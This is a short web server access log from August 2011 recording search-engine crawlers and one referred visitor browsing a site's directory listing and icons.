38.101.148.126 - - [21/Aug/2011:13:59:11 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
193.47.80.51 - - [21/Aug/2011:15:12:17 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [21/Aug/2011:15:12:18 +0000] "GET /?C=S;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
67.195.115.166 - - [21/Aug/2011:15:53:46 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [21/Aug/2011:15:53:46 +0000] "GET /?C=N;O=D HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.131.106.22 - - [21/Aug/2011:15:56:07 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.22 - - [21/Aug/2011:15:56:11 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
24.161.73.98 - - [21/Aug/2011:18:06:03 +0000] "GET / HTTP/1.1" 200 749 "http://www.pojo.com/magic/Featured%20Writers/DragonsDen/index.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
24.161.73.98 - - [21/Aug/2011:18:06:03 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
24.161.73.98 - - [21/Aug/2011:18:06:03 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
24.161.73.98 - - [21/Aug/2011:18:06:03 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
24.161.73.98 - - [21/Aug/2011:18:06:06 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
24.161.73.98 - - [21/Aug/2011:18:06:15 +0000] "GET /?C=N;O=D HTTP/1.1" 200 749 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
24.161.73.98 - - [21/Aug/2011:18:06:19 +0000] "GET /?C=N;O=A HTTP/1.1" 200 749 "http://pojo.findmagiccards.com/?C=N;O=D" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
